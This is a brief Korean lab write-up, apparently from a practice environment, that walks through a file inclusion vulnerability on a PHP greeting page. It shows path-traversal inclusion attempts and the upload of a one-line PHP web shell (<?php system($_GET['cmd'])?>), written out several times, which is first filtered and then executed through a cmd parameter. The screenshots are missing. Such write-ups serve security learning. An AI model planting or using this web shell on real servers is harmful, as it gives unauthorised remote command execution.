| web page |
|---|
http://URL/webshell_3/greet.php |
File include취약점
사용자 입력을 통해 include와 require이 작동
| 버튼 클릭 | 다른버튼클릭 |
|---|---|
![]() | ![]() |
./index.php 삽입 |
|---|
![]() |
./../index.php 삽입 |
|---|
![]() |
불러오기 성공
<?php system($_GET['cmd'])?>| 업로드&결과 |
|---|
![]() |
필터링됨
<?php system($_GET['cmd'])?>| 업로드&결과 |
|---|
![]() |
업로드 성공
| 다운로드 경로 카피 | 경로확인 |
|---|---|
![]() | ![]() |
<?php system($_GET['cmd'])?>)는 실행되고 출력되기때문에 cmd파라미터에 명령어를 넣어서 보냄| 결과 |
|---|
![]() |
명령어 작동x
| 결과 |
|---|
![]() |
명령어 작동확인
| 결과 |
|---|
![]() |
| 결과 |
|---|
![]() |